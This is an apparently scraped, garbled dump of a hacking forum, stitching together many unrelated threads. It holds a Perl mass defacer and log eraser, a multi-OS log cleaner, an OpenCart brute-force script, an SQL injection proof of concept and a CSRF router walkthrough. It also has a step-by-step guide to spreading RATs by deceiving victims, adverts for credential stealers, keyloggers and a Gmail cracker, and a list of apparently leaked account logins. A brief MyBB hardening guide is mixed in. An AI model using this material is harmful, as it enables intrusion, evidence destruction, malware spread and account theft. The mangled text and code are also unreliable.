html usr bin perl use strict index argv argv index system echo mstarted msrml. 
pri system echo mdefacing all homepages. 
system find name index exec index system find name main exec index system find name home exec index system find name default exec index system echo done all sites this box should defaced system echo system echo mcleaning logs. 
system echo erasing default log files too fast var log lastlog system 'rm var log lastlog' system echo var log lastlog erased else system echo var log lastlog such file directory var log wtmp system 'rm var log wtmp' system echo var log wtmp erased else system echo var log wtmp such file directory etc wtmp system 'rm etc wtmp' system echo etc wtmp erased else system echo etc wtmp such file directory var run utmp system 'rm var run utmp' system echo var run utmp erased else system echo var run utmp such file directory etc utmp system 'rm etc utmp' system echo etc utmp erased else system echo etc utmp such file directory var log system 'rm var log' system echo var log erased else system echo var log such file directory var logs system 'rm var logs' system echo var logs erased else system echo var logs such file directory var adm system 'rm var adm' system echo var adm erased else system echo var adm such file directory var apache log system 'rm var apache log' system echo var apache log erased else system echo var apache log such file directory var apache logs system 'rm var apache logs' system echo var apache logs erased else system echo var apache logs such file directory usr local apache log system 'rm usr local apache log' system echo usr local apache log erased else system echo usr local apache log such file directory usr local apache logs system 'rm usr local apache logs' system echo usr local apache logs erased else system echo usr local apache logs such file directory root. 
bash history system 'rm root. 
bash history' system echo root. 
bash history erased else system echo root. 
bash history such file directory root. 
ksh history system 'rm root. 
ksh history' system echo root. 
ksh history erased else system echo root. 
ksh history such file directory system echo done all default log and bash history files erased system echo now erasing the rest the machine log files can long system 'find name. 
bash history exec system echo all. 
bash history files erased system 'find name. 
bash logout exec system echo all. 
bash logout files erased system 'find name log exec system echo all log files erased system 'find name. 
log exec system echo all. 
log files erased system echo done all log files erased system echo system echo msrml. 
else system echo failed the path u're index could not found exit else system echo morocco. 
rulz mass defacer and log eraser system echo coded pri system echo priv priv priv priv system echo musage perl system echo mexample perl tmp index. 
html exit php code usr bin perl warnings enabled log cleaner version public created illuz root. 
net greets pxncture shades xell optiplex give credits where needed illuz nostur this took time hope you fucking use report bugs illuz hotmail. 
org forums illuz note you must root print log cleaner. 
org while print enter which user input chomp takes into memory help print enter your choose from 'linux' 'aix' 'sunos' 'irix' print hit enter with let the script its work print note you must root print contact illuz root. 
org illuz hotmail dot dot print for bug finds. 
have fun print illuz linux linux typed the following and start brackets foreach logphile linux unlink logphile print fucked logphile elsif sunos sunos typed the following and start brackets foreach logphile sunos unlink logphile print fucked logphile elsif aix aix typed the following and start brackets foreach logphile aix unlink logphile print fucked logphile elsif irix irix typed the following and start bracket foreach logphile irix unlink logphile print fucked logphile else print umm wtf logs irix systems start irix bracket irix var adm syslog var adm sulog var adm utmp var adm utmpx var adm wtmp var adm wtmpx var adm lastlog usr spool log var adm errs usr lib cron log var adm loginlog var adm pacct var adm dtmp var adm acct sum loginlog var adm msgs var adm crash vmcore var adm crash unix end array end irix bracket log sof aix systems start aix bracket aix var adm pacct var adm wtmp var adm dtmp var adm qacct var adm sulog var adm ras errlog var adm ras bootlog var adm cron log etc utmp etc security lastlog etc security failedlogin usr spool mqueue syslog end array end aix bracket logs sunos systems start sunos bracket sunos var adm messages var adm aculogs var adm aculog var adm sulog var adm vold. 
log var adm wtmp var adm wtmpx var adm utmp var adm utmpx var adm log. 
log var log syslog var log poplog var log authlog var adm pacct var logs lpsched var logs requests var cron logs var saf log var saf port log end array end sunos bracket logs linux systems start linux bracket linux var log lastlog var log telnetd var run utmp var log secure root. 
bash logut var log wtmp etc wtmp var run utmp etc utmp var log var adm var apache log var apache logs usr local apache logs usr local apache logs var log acct var log xferlog var log messages var log proftpd xferlog. 
legacy var log proftpd. 
xferlog var log proftpd. 
access log var log var log var log. 
access log etc mail access var log qmail var log smtpd var log samba var log samba. 
var lock samba root. 
xauthority var log poplog var log news. 
all var log spooler var log news var log news news var log news news. 
all var log news news. 
crit var log news news. 
err var log news news. 
notice var log news suck. 
err var log news suck. 
notice var spool tmp var spool errors var spool logs var spool locks usr local logs var log var log ncftpd misclog. 
txt var log nctfpd. 
errs var log auth end array end linux bracket ends loop coded illuz credits illuz nostur thanks man. 
thank you for sharing bwo. 
com wrote reply see hidden content hvarshney wrote pavansrivatsav gmail. 
com wrote reply see hidden content want see. 
thank you for share collection. 
wanna know how hack whatsapp chats. 
cause interested learn new things. 
noob here could pls tell how. 
checked out the link and says that the file has been removed. 
can someone pls give. 
hope its still working. 
link not working account suspended. 
wrote let see iof works. 
still working luck for. 
seems quite interesting thanks for the script codefire. 
this simple guide read somebody else facebook messages without any effort cheers mike take look account suspended. 
this simple guide read somebody else facebook messages without any effort cheers mike nice job bro. 
its good bro can't found vulnerable site. 
thanks you very much mike. 
thx for sharing thx for sharing bro will try. 
want share with private shell cyber army color reply here view the download link. 
doe wrote hide all. 
seriously hit that button that's motivating factor don't think necessary for virus scan but for who skeptical here. 
ejlidibi xepnt hodbfygjeqaqmg does contain malaysia sever. 
virg wrote looking other peoples watsapp chats updated now works. 
exe good topic thanks. 
this the best software the job. 
thanks for share will definitely try. 
type the following into the url bar code about config check here see the before and after results. 
info search for the following network. 
timeout and that all can remember for now off the top head. 
this simple guide read somebody else facebook messages without any effort thank cheers mike. 
hello guys this first thread this awesome forum this tutorial will explain how perform basic cross site request forgery attack csrf. 
this original work not copied. 
just noob there's any mistake please don't troll just tell let's start the tutorial what csrf attack csrf attack which forces end user execute unwanted actions web application which she currently authenticated. 
with little help social engineering like sending link via email chat attacker may trick the users web application into executing actions the attacker's choosing. 
successful csrf exploit can compromise end user data and operation case normal user. 
the targeted end user the administrator account this can compromise the entire web application. 
burp suite regular professional both will work. 
you don't have burp suite download from. 
net burp get burp pro. 
won't cover how set burp suite the following the link awesome tut setup burp. 
you have now configured burp suite just start turn off the intercept for now. 
open firefox any other browser router default gateway mine case. 
you will asked for username and password generally most the routers have default user password combination code admin admin user user admin pass admin password user password you can't open your router gateway please close this window and watch chota bheem pogo. 
now have successfully opened the router gateway. 
find password change page for case was maintainance administration. 
now can see the options change password burp suite window and click proxy tab intercept turn intercept. 
and now the input new password and confirm password will enter pass pass. 
note old password was 'admin'. 
make sure you have turned intercept. 
click save router gateway. 
now burp window will appear with some sort http headers and post details. 
you will see the end that it's displaying what just entered the password form. 
this http request can see that there anti csrf protection token. 
code anti csrf tokens are some sort hash random combinations letters numbers which gets validated the server make sure that request from authenticated user with his own permission not forged. 
now right click burp window engagement tools generate csrf poc. 
new window dialog box will appear with some html codes copy that. 
save that code html document. 
drop the http request clicking drop button the interception tab. 
this not change the password just stop the request password change. 
your router gateway still old password. 
for confirmation logged using old password 'admin'. 
used the old pass and logged means just because dropped request password didn't changed 'pass' and was still the old one 'admin'. 
html file you saved your drive you'll see submit button make sure your intercept. 
after clicking that again burp window will appear and show the same http and post request which got after password change page router gateway before. 
now click forward allow the page perform requests. 
voila you just changed the password using csrf without opening the router page without entering details password changed with post request. 
trying new password 'pass' opens the router gateway password change page. 
here proof that password changed the authorization header with some base actually the user pass. 
which the base encode 'admin pass' the old one was for 'admin admin'. 
the whole idea behind csrf change user details without actually letting the victim know enter and interact the target page. 
this done post request sites withno csrf anti csrf protections. 
some times the site will have anti csrf token but still attacker can bypass the anti csrf protections just checking the tokens are validated server it's easily guess able combination. 
will post csrf protection bypassing soon. 
hope this tutorial helps someone. 
let try this out ill try now. 
let try this out thanks. 
gonna try out thanks for the share. 
notice before reading this not guide making your forum completely secure and untouchable but this guide the many different things that one can tighen security. 
would also like note that the latest version mybb very secure even out the box. 
also note that i'm expert this i've never even had public mybb forum but i'm hoping start one soon. 
this mostly about securing mybb itself look elsewhere for information securing any other web applications that you are hosting the key points keep your forum date possible very important you keep everything date this includes plugins. 
make sure manually check for updates the admin often and frequent the downloads section mybb. 
com check before installing plugins plugins have the potential bring down your whole forum they are insecure intentionally backdoor. 
google your friend with plugins ensure you check through any posts advisories the plugin and any other sources the plugin that could are more likely secure. 
don't use cracked nulled plugins. 
you can understand php then look through the code. 
the code encrypted obfuscated etc. 
and the plugin not commercial then very careful. 
look into the plugin author and their credibility well. 
using plugin that used and made labrocca for example much better idea then some random thing you found dumped the net. 
use secure and unique passwords ensure the passwords all powerful accounts are different unique long and use large array chars. 
ndeyd dne dhy ednye ydp jnpknbggdue the type thing you are going want password any account with powers that could damage the forum. 
don't use passwords that you use other forums because they could easily tracked down. 
you can't remember the password store encrypted vault such keepass vault. 
deny access directories there are number directories mybb that contain files that never need accessed from browser. 
it's good idea deny access these. 
directories protect root inc root install whenever not needed root admincpdir inc root admincpdir modules there legit reason access this stuff it's best create. 
htaccess file the root these directories containing the following. 
deny from all another way add security the files the add create. 
htaccess file the forum root containing options indexes stop anyone browsing folders without index. 
another thing one can the rename the admin directory this open root inc config. 
php and edit the config 'admin dir' whatever you want your new directory then rename the actual directory from 'admin' whatever you specified the config. 
this does not give much extra security unless you set the config 'hide admin links' note you will need access the admincp from stored link rather than from link the front end this enabled obscure obscure obscure it's great idea make hard possible for potential attacker get correct information your forum. 
change the default table prefix this can done easily upon when installing fresh install mybb the installation wizard this can also done the config. 
php but only people who know what they are doing should attempt change after mybb has been installed also note that few plugins are broken non default table prefixes. 
this can make harder for sqli masters attack your other things you can include giving your main account the one you post with super mod perms and giving super admin another extremely secure account that has normal usergroup it's primary. 
lock down the admincp it's very important implement extra security the admin prevent unwanted access. 
here are few things you can. 
add extra auth with. 
authentication the above links can used generate the files needed this. 
once done simple place the. 
htaccess files the admincp directory for some extra security. 
make sure the user pass different the admin password. 
add whitelist the admincp you can use. 
htaccess permit only those with certain access the admincp this very secure it's not very good idea this you have dynamic though because you might find your self locked out one day. 
htaccess file the admincp root containing the following. 
order allow deny allow from your. 
adress add pin the admin this pretty much does the same thing. 
htpasswd but can look little better. 
there are plenty tutorials this just make search. 
remove the backup system from the admincp someone was gain unauthorized access the admin they could easily dump all the sql info using the built backup feature. 
it's good idea disable this you are not going use. 
simply root admincpdir modules tools backupdp. 
php and add the following after the. 
these are the key points. 
after this will just put few simple extra tips and some links for more info run mybb with database user that not used with anything else your website prevent one failure leading another restrict the database user that mybb uses only able what needs and nothing more restrict php only able execute functions that are needed and nothing more remove any features you don't need don't use the portal. 
then remove don't use the calendar then disable etc make sure you don't have scrutinize enabled unless you really really really know what you are doing search through forums exploit db's for potential exploits often you are starting forum from scratch change how passwords are salted and hashed for some extra obscurity the event your leaked you've left anything areas the public can access such plugin zip file phpinfo. 
php then sure remove. 
link the account has been suspended fyi. 
what the password have download but required password pls help email gmail. 
will helpful some stages. 
very cool can you explain the purpose grabbing named. 
conf during hack just learned this and wasnt aware this bypass although notice priv shell from boys may use this missing something not using this file hack servers may sound dumb but self taught and miss allot things. 
i'd love learn some basic hacking. 
nice place nice place. 
want the see the link. 
want try this its working. 
jamavi bapalya jami jami. 
hidden content reply see the content thanks you bro. 
doe nice ima check out. 
wrote free vps server free vps ram free domain name free webhosting the most affordable free premium vps hosting the internet the most affordable free premium vps hosting the internet. 
zilberman wrote codefire wrote what are the packs exploit packs are distributed via web encrypted bundle tipically signed gzip file and contain additional modules that plug directly into exploit pack. 
that might use somebody. 
tjtyjyt tjtjtjtjttjt ktk ktyk tktjtyj. 
thanks man hope the link not broken. 
thank you for the post bro. 
download before move them url. 
url contact anyone want any hacking stuff done but wont free. 
thanks bro nic one share cool. 
bond benzthank you very much free working php script check valid emails and registred with paypal. 
screenshoot dow thank you nload. 
replying tosee the content wrote yea you heard correct its leaked not believe take look the link enjoy mike. 
great job man keep. 
nice bro pls share link. 
thanks broo very nicee. 
looks really nice thanks for share. 
lets see the link and then comment good. 
thanks for this tools let test. 
and all works perfectly lets try out send the downloand link hotmail. 
which software you are saying about may you are using different version. 
please check the version with the relased version. 
nice post ill test. 
thanks brother pruo mexican power. 
codnice efire wrote wibr application for testing security the wpa wpa psk wifi networks. 
realtimeplayer wrote codefire wrote what rfi remote file inclusion remote file inclusion rfi type vulnerability most often found websites. 
this can lead something minimal outputting the contents the file but depending cool ssfully the target site and think you all know that what all you can after uploading shell the site smile thanks for the info bro. 
thanks for the tutorial mang. 
it's not working mate says it's been moved thanks for reposting will try now don't work will you pls says the file longer there mate. 
hope can use this improve knowledge. 
have not seen this tool for long time. 
hope there are new features. 
hope this gonna work fine and not back door. 
cheers mike table need the download link. 
this agreta share awesome. 
sdasda dsadsa dadd dsdadss. 
hello bro how are doing want learn how spam please add yahoo messenger rkujenya yahoo. 
thanks for this piece soft. 
screenshoot download job man you are the best need exploits hack websites. 
let's see this works. 
hey bro this old version. 
download new version here this link. 
thanks codefire wrote this tutorial for education purposes only and not responsible any way how you use the information provided and what you with the files. 
ziv hide reply step step upload main. 
com your own hosting first download spyeye this link hide reply. 
ziv hide reply thanks for reading tutorial. 
connect with skype iam thegame like facebook page and join group. 
kindly for this yay. 
i'd like know there way for access bigger sized image from the image link source code few images featured worthpoint website. 
anyone knows their stuff and can help point the right direction would appreciate greatly and will transfer via paypal for your trouble. 
one the images featured this link. 
this one the best stealers that have used since way back the day when istealer was available good old days. 
this was originally written russian the panel and the builder believe have both been translated english except for the help page the panel it's still russian. 
just use google chrome you want read translate. 
this clean copy download link goes down. 
builder panel functions collects ftp http passwords from ftp clients. 
collects web browser passwords from popular browsers. 
collects email passwords pop imap smtp. 
bot victims computer for limited time. 
working windows and windows vista and windows and windows and windows server and collects following passwords system info far manager total commander ftp cuteftp flashfxp filezilla ftp commander bulletproof ftp smartftp turboftp coffeecup ftp sitemapper coreftp ftp explorer frigate ftp securefx ultrafxp ftprush bitkinex expandrive classicftp fling softx directory opus freeftp directftp leapftp winscp bit ftp netdrive webdrive ftp control opera wiseftp ftp voyager firefox fireftp seamonkey flock mozilla leechftp odin secure ftp expert winftp ftp surfer ftpgetter alftp internet explorer dreamweaver deluxeftp google chrome chromium srware iron chromeplus bromium yandex chrome nichrome comodo dragon rockmelt meleon epic staff ftp aceftp global downloader freshftp blazeftp netfile goftp ftp easy ftp xftp ftp now robo ftp linasftp cyberduck putty notepad coffeecup visual site designer ftpshell ftpinfo nexusfile faststone browser coolnovo winzip yandex. 
internet myftp sherrod ftp novaftp windows mail windows live mail becky pocomail incredimail the bat outlook thunderbird fasttrack download link click here rar password screenshot panel click here screenshot builder click here virus scan click here stub scan. 
weird wedisten words with hidden content havee post more. 
nice exploit appreciate you sharing. 
lets see and this thread. 
wow nice dude best. 
nothing reply nothing reply nothing reply nothing reply. 
hey very good thread hope this helps. 
ejlidibi xepnt hodbfygjeqaqmg doe wrote hide all. 
blackhat wrote thanks for this man would like check this out pls. 
nice one love this. 
thanks nigga hope works. 
com jshaw cheatsheets let see bro. 
friend request bomber too requests hour thanks. 
selling private passwords pornportal accounts only for best selling one account give access wicked mofos twistys babes etc. 
payments accepted paypal payza contact only. 
com skirby starcraft mofos iknowthatgirl publicpickups wicked twistys babes. 
com tiger gracie mofos iknowthatgirl publicpickups. 
com jdcohen jdc mofos iknowthatgirl publicpickups. 
com ren ren arsis brownhole hide. 
com home mcmullan collins detr wings dunja jmclemoe samantha oboylerules bergen tennis nrthdog rxf rfonln wicked. 
com home ziegel werfte mofos iknowthatgirl publicpickups realitykings daredorm wicked. 
com home waratsea realitykings. 
home warrior redrage djbg iverson erito mofos iknowthatgirl publicpicups realitykings wicked. 
com home ruttinwombat mikail faketaxi fakeagent. 
com haggjan firmamic miclarsen. 
com home nymaen harkul asimas chuck peek now ricacastle samsic nlindm annelise bargeman lover muschel muschel gedd hiowz bobbasystem mofos iknowthatgirl publicpickups. 
com bennyman yuxff awj kja mofos iknowthatgirl publicpickups. 
com home hackman hackbenz. 
com kochrolf pitztal joeyfumo london. 
login hellhound sbe jayporn dwarf. 
com hazk mpear wchs oharris famkej mastergee age bios palprove firnuvid. 
com home pandacandy xiongmao. 
com dsddsd bouquet elygra argyle tschardt admin. 
com apester light mofos iknowthatgirl publicpickups realitykings gang gfrevenge wicked daredorm teenpinkvideos dxstar twistys babes. 
com dackjaniels mofos iknowthatgirl publicpickups. 
com zestyut tasootha kdawg kdawg. 
com members colljimmy adam. 
com sheeba minderbinder minderbinder. 
com hellhound sbe jayporn dwarf. 
com kathos ctr sush. 
com hgaudet randomword sudan verify. 
php members jimmycx seamus frasera melker dogear changeme mircealyon puisard wlfman chang eticket sleddogg fan tkr nosypeace katies gracie elevatedx adm. 
com paddler whipman hotmail. 
com kidman trym fotball hotmail. 
com sandeedsk david minnesotahp thewild cali nothing rfawaz charge. 
com hpkkph kph bernie giotta xreviews reviews ndorfn. 
com members celtic paintball chaser ruthe chilltown agrafe chinoyboi chomper mar ion. 
php godofhellfire biteme scrote eagles tippy fishies schaferfubar comcast. 
members russconte berndeder sabine mrjiraiya heihachi. 
html mwwhiz miake pauly pavanf azul aldon meauhitd pvujziur. 
com vlad mara estanis stanis ultrasoundboy gatordud bestreviews temppass. 
com members home tjqs factx vjnt mfci hjtne mvesor. 
com user login pwlassiter cindy. 
com login nouseforaname ollaolla. 
com login lastexile oliver. 
com charge johnw rock billyb nomercy ashgarth samuel. 
com login lock load smooch gamand fiorenza malandro onuerteen. 
com dink chiloutchilo omgitshuge youknowit biscuit biscuit jujuju. 
com testpass testpass biggindin bigman policy review macfreak fender. 
com spachi spa mrchin derkaise blare lnnw. 
com kielosa kwiettie denon kirsten nctest password. 
login jayporn dwarf tdski single audlori. 
com jamiewalker bolton shoe wishbone jamiewalker bolton. 
com ludoplusdue ciaociao gregm martin. 
com krahstat skrstat hartzogh nashville. 
com xkfu robh june. 
com ciasto blauhans elvira. 
com qaqynt ishere sandmann ishere iei ncmi iei ncmi. 
com works only firefox adozaqui piloto audlori bargeman lover codyhsm hsm dao gccross cookie. 
com restricted fattime tobin. 
com full tsdght pussy. 
com raultrinchard merdouzi vinx jerkfacx. 
com restricted futbal floger. 
com members terry dylan. 
com members super super. 
com members nick doctor. 
com stratemstr acepage alopandur bemlitimamu. 
net elmonteslim einstein tigellino riccardo boston redsox mikeblak texans. 
com rawpee muoiml rugbyman barbie epoch epoch. 
com access login psx dink chiloutchilo lucasnyhed nynne. 
com fakeagent mareid angel angelica streamate advertis. 
com main tennisri abraxas steelfixer coco excell ryidgo calex trustno. 
com nick doctor terry dylan jipe popol bobsmith hide. 
there anything like western union logins that will use making transfer. 
xpress money heard that going please hackers help make research. 
thanks hoping for positive result. 
cheers for this one bro. 
php code usr bin pythonimport urllibimport urllib import osimport sysimport timedef cls. 
system 'clear' cls demo ''' opencart cms brute force. 
info use python opencart. 
txt '''print demoprint site sys. 
replace else passdef opencart coder passwd password try time. 
time agent 'user agent' 'mozilla. 
post post 'username' admin post 'password' passwd url. 
urlencode post headers agent box coder. 
read 'logout' box time. 
time print print domain site print username admin print password passwd print time str print print print coded print. 
passwd except exception print ethread neo cookielib. 
splitlines for passwd password threading. 
thread target opencart args coder passwd password. 
join print print coded code how use python opencartbf. 
thank you let see whats this edit link expired. 
thank you bro nice tool. 
thanks for share man you are the best. 
pratham wrote ardamax keylogger keystroke recorder that captures user's activity and saves encrypted log file. 
download url thank dude for doing this man. 
working then download dude thanks. 
still working let's see let's see this still working. 
gonna try this spyeye. 
pretty post wanted pocess features that backtrack does not have. 
its fake not working for. 
really interested how know that works. 
spy your friend whatsapp account whatsapp verifies phone mac address. 
install buysbox for rooted device here. 
com store apps detai. 
installer for busybox not rooted for unrooted phone here. 
install android terminal emulator here. 
spoof mac address tutorial how spoof mac address here update guide url. 
php postcount spoof wifi mac address android post xda forum url. 
security vulnerability facebook business manager endpoint allows third party application hack any facebook page with limited permissions and the victim will permanently lose admin access the page. 
don't worry you can still modify the permissions you have granted other apps here. 
love see this vpn. 
exploit title cythosia botnet sql injection vulnerability date. 
exploit author galaxyandroid vendor homepage unkn application screenshots. 
tested windows with xampp greets goes chrisksk protestants ukraine keep pushing greets nsa gchq usa aus can gbr nzl vuln code vuln code all post parameters the file socks. 
php are vuln against sql injection empty post 'hwid' empty post 'cn' empty post 'ip' empty post 'port' query mysql query select from hydra socks where hwid. 
mysql num rows query sql mysql query update hydra socks set. 
else sql mysql query insert into hydra socks hwid country port values. 
sql echo fail echo mysql error exploit poc gets the mysql version information post. 
content type application form urlencoded content length accept user agent mozilla. 
miauu connection close hwid and select from select count cconcat select select concat cversion from information schema. 
tables limit cfloor rand from information schema. 
tables group and test test port test response warning mysql num rows expects parameter resource boolean given xamppneu htdocs cythosia webpanel socks. 
php line failduplicate entry. 
for key 'group key' poc whoami post cythosia webpanel socks. 
connection close hwid and select from select count cconcat select select concat cuser from information schema. 
tables group and test test port test response warning mysql num rows expects parameter resource boolean given xampp htdocs cythosia webpanel socks. 
php line failduplicate entry 'root localhost' for key 'group key'. 
pratham wrote exploit title wireless lite adsl modem router model multi exploit author pratham wireless lite adsl modem router model multiexploit modem pic change login password url new password upload config url reset router url read. 
yep thx for dis articale and your efforts some good comments over there. 
virg wrote looking other peoples watsapp chats let see your skill. 
thsnks again much usefull. 
will take look see this works. 
really what can see. 
cool like thins for leak. 
more information its welcomed. 
patch not working got error. 
close home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community ihatehissite offensive community hacks exploits and various discussions hacking tools and programs leak tacoz hack pack crypters ebooks stealers vpn proxytools cracking software expoits announcements some other awesome news share pages previous new reply thread rating vote average thread modes leak tacoz hack pack crypters ebooks stealers vpn proxytools cracking software expoits johncenahax offline junior member posts threads joined jan reputation location united states country united states money donate wrote hey guys finally releasing own hack pack there lots stuff this big pack enjoy image cool. 
wsoso password for file tacoz sure smack that image ntt. 
png email find rate reply report offline junior member posts threads joined jan reputation location india money. 
notbad find rate reply report timkatimka offline junior member posts threads joined jul reputation location asia country india money. 
donate skg lsfkg lks lfgk wlk lkglk email find rate reply report nighty offline junior member posts threads joined jan reputation location lmao country turkey money. 
donate yesterday thanks notbad notbad notbad email find rate reply report interweb offline junior member posts threads joined aug reputation location country united states money. 
donate hours ago looks like solid pack good looks email find rate reply report spartan offline junior member posts threads joined jan reputation location india country india money. 
donate hour ago thanks. 
email find rate reply report pages previous new reply quick reply message type your reply this message here. 
signature disable smilies possibly related threads. 
thread author replies views last post mega tools keyloggers stealers ddos brute crypters java driveby free codefire minutes ago last post mrz hack pack. 
codefire last post dcaeon email recon. 
email reconnaissance software privateloader last post wibr plus wifi bruteforce hack pro codefire last post jonathan how hack private instagram account drowssap last post drowssap large password list free download dictionary file for password cracking codefire last post firstanonymus whats the most powerful software the world like langaurd and linux but better brndonw last post brndonw hack sudharsan last post pootr webroot hack tools special bypass shell webr last post cunlestic how hack wifi through android device jagbeers last post jackboywu view printable version send this thread friend subscribe this thread forum jump users browsing this thread ihatehissite about offensive community offensive community world best underground hacking forum that provides tutorials latest hacking techniques free tools and great online teaching our members. 
can't find tut after reply. 
nevertheless you can't give people like idiot yet lol it's detectable avs you need crypter you kind find lots here this forum try customize change icon bind make something clever yet simple it's the end have fun now and took hour and half make this will take you sec say thanks don't shy there okay oka. 
org mirror hacked thanks brother. 
muito bom obrigado cara muito bom obrigado irmao mais link. 
all this ppl bringing things here without help. 
been looking all day thank you. 
great how can download this. 
nice ways used them too but success rate less post example live example possible. 
haha let's see how this trick works. 
iis exploit website hacking windows steps color computer right cilck and select add network location click next click next now enther the url vulnerable website and click next for example take this site. 
asp and click save now you wil get page which will show that the page defaced you've done now whn will open that website you will got your deface page home color reading this cool cool. 
let check this tool hope work good. 
tutorial epic rat spreading guide detailed methods tutorial presents the last time saw lot people asking for help with spreading there keylogger there rat. 
now decided make huge tutorial spreading help the community. 
will start with very basic and famous stuff like youtube and also few advanced methods. 
general things you need rat ready set make sure its working crypter you will get lot more victims your server fud filehost for example fileave dropbox computer brain would not bad methods. 
youtube opinion the most famous and easiest method. 
great you want target special group like people with special accounts for example steam. 
com and register account not allready done. 
example will target people with steam accounts look for some videos with the title steam hack black ops hack keygen something like that. 
you also can look for paypal hack video you will find something you like. 
when you found good video keephd. 
com and download the video your preferred quality. 
then back youtube and upload the downloaded video. 
while uploading think about attractiv title for the video for example black ops keygen working. 
the description put small text for example readme and your server. 
when its uploaded your done. 
tips the beginning your views and downloads will only increase slowly but they raise fast and you get good amount downloads. 
can help use youtube bot increase views thumps etc. 
make your video more legit looking ask few friends you havebiggrin. 
forums first all dont mean hackforums. 
net dont want anybody posting malware here opinion its another simple method. 
there are alot big and activ forum post some malware. 
the best choice are forums with lot young members because they download everything they can get and that sounds cool and interesting talking from own. 
look for big forum google. 
will come lot them would take one from the first google page. 
easiest forums spread are gaming cheating forums because most them are kids teenager. 
create new account there with cool username should look trusting not hack you. 
design your profile with avatar signature some fake details like you want. 
make some threads catch the members attention and make you looking more trusted. 
after time make new thread about new simple wallhack working keygen you coded the last time. 
make the thread attractiv and detailed catch the readers eye. 
you should add detailed feature list screenshots and maybe short video. 
wait for the first kids downloading your file. 
tips make multiple accounts answer your thread and vouch for you. 
these account should also look legit the others not time posters joined minute before. 
torrents another easy method that will get some easy bots for you. 
download torrent program like bittorrent here guests cannot see links the messages. 
please register forum clicking here the see links. 
install bittorrent not allready done. 
file create new torrent. 
look for your file and select. 
now new torrent with your file will created. 
famous torrent site like piratebay. 
upload your new torrent the site with detailed description. 
title choose something like paypal hack beta keygen something that will attract many people. 
omegle this more complicated because you dont get that many downloads you have work for each one. 
there are diffrent omegle methods you only can post your server link each them and say its photo package but thats not working good. 
give you better method. 
think many will know. 
download the program manycam which allows you use virtual webcam. 
download this video pack girl. 
can wave and some other things. 
download guests cannot see links the messages. 
this not video package but used few times. 
thanks whoever posted thisbiggrin. 
start omegle soon you get into conversation with somebody your many cam and start the 'wave' clip. 
waves the person and looks very legit. 
start conversationen about some normal things with him her. 
after that ask she wants see some pictures. 
sent him your server. 
exe your javadriveby and your done opened. 
tips you fail you can retry often you want you should replace the server. 
exe icon with jpg icon and may hide the file ending make more legit. 
javadriveby javadrivebys are great. 
you put them site and everyone who visits this site download hidden file and executes. 
your server fud most people will not notice something wrong. 
will present you very simple java drive you can search the forums find more advanced ones. 
the url field enter your direct server link. 
after loading the url you can change the name the url something good looking for example paypal hack. 
after getting this link you can spread everywhere you want. 
tips you can spread this with the help other methods this tutorial. 
say you made cool new website with lot hacking tools and software you want show your new website and the people will click because they are interested your site. 
ptc sites ptc sites are sites that pay you for visiting links sites for short time. 
for this method will use javadriveby that will advertise ptc site for low amount money. 
you will get views your link for only. 
first all make your javadriveby ready work. 
then look for big ptc company. 
many them are scam but there are few ones that are. 
take the site paidtoclick. 
make new account there and make ready work. 
click the advertise button. 
click the buy now button besides the link hits. 
create new link with title you want for example money making software something like that. 
put your javadriveby into the target url field. 
leave the rest blank. 
then pay for and wait for the victims biggrin tips the more money you invest the more victims you get. 
try diffrent ptc sites that are activ. 
auto spreader auto spreaders worms are helpful thing spreading. 
you put your file little server and spreads itself from every slave other people. 
many worms use facebook msn chan and other communities chat programs spread itself. 
you can spread your worm with the help the methods above and you will multiple your victims and spreading work. 
thanks for reading guide please post little feedback give stuff edit make better. 
color guide online anonymity how can completely untraceable definition the act keeping your identity hidden online using connection methods and encryption methods make yourself untraceable person website company school whatever else you are doing connecting. 
uses anonymity stay hidden when attacking website scanning for. 
keep your browsing history activity hidden when work school library even your family computer. 
keep your internet protocol address hidden from victims rat remote administration tool botnet. 
bypassing isps service usage limits. 
what vpn vpn acronym for virtual private network server that used connect lan local area network securely. 
vpns will encrypt your connection information and hide your real from websites people and will keep your connection encrypted you won't able get traced. 
list good free vpns cyberghost vpn you must create account pro xpn create account. 
open vpn open vpn requires configuration files. 
you add them program files openvpn config hot spot shield hss openvpn based you download the client and will hide your. 
paid vpns why are paid vpns better than free they are more secure and keep logs. 
when free ones will keep logs and aren't securely encrypted paid. 
blackshades vpn pretty much the best product line hackforums you can never wrong with blackshades product. 
nvpn openvpn based amazing speeds and panel controls and really simple set. 
ipredator not known around much but it's good. 
what socks socks the internet protocol that makes easier for packets routed between the client server via proxy server. 
the socks protocol has designated port but not limited that port. 
socks will let you get the network firewall usually with schools workplaces they will have block the browsing you are allowed. 
what http proxy http hypertext transfer protocol proxy kind the same thing socks except the fact using the http protocol instead the socks protocol. 
when browser configured with http proxy just hooks through the proxy server and bypasses any firewall put place the lan local area network web proxies and proxy client managerseb proxies proxy filter omniscient hide ass proxify foxyproxy firefox addon proxy manager tor read the page. 
tor isn't safe people think. 
what ssh and ssh tunneling ssh the acronym for secure shell network protocol used connect linux unix based machines. 
this will let you access the shell terminal via remote connection the machine server. 
the default port for ssh connection. 
ssh tunneling using the ssh protocol hook through the machine server you send command through your internet say loading google your machine will send the data through the ssh tunnel and your will hidden from the website. 
your data going through the tunnel encrypted using public key encryption. 
what mac address and mac address spoofing mac address the acronym for media access control address it's the unique identifier for network interface. 
like think the fingerprint your connection. 
mac address spoofing using program you can manually but program much easier. 
change your mac address doesn't leave behind your networks fingerprint. 
without doing this you will never fully anonymous. 
smac nmap spoof mac the command you use spoof your mac with nmap. 
for reading this hope understood something. 
nice thanks nice thanks nice thanks nice thanks. 
hey guys made this post know the vskimmer bot dangerous not strong bot what think guys. 
thanks will try this out soon. 
this does this still work. 
this pass for which website bro. 
can't see the download link. 
thanks for share friend hahahahahah. 
friend request bomber too requests hour thank you for the nice stuff. 
add save and load own dorks now download here. 
hello community have you ever wanted hack someone's mail account you need find person's sensitive information you want invade person's paypal skrill amazon apple facebook any other site account we're here present gmail password cracker the name says gmail password cracker simple software developed for cracking gmail password accounts. 
btc via satoshibox buy gmail password cracker full you can also download the trial version test the program. 
there limit maximum password decryptions download trial direct link alternative trial download server any doubts suggestions you can contact skype xcodingteam happy cracking. 
this indeed looks very interesting although have idea why would free everyone whom made account via website has profited. 
cool cool cool cool cool cool cool. 
pratham wrote sarfroz wrote yeah had earlier were using and the port was but now when fortiguard has been used proxy with port doesnt work. 
goo bro using proxy with port use this sites url and check proxy and port. 
you will get millions proxy list updated each and every second. 
this sounds like must have thanks mate. 
once website has this vulnerability but when include shell. 
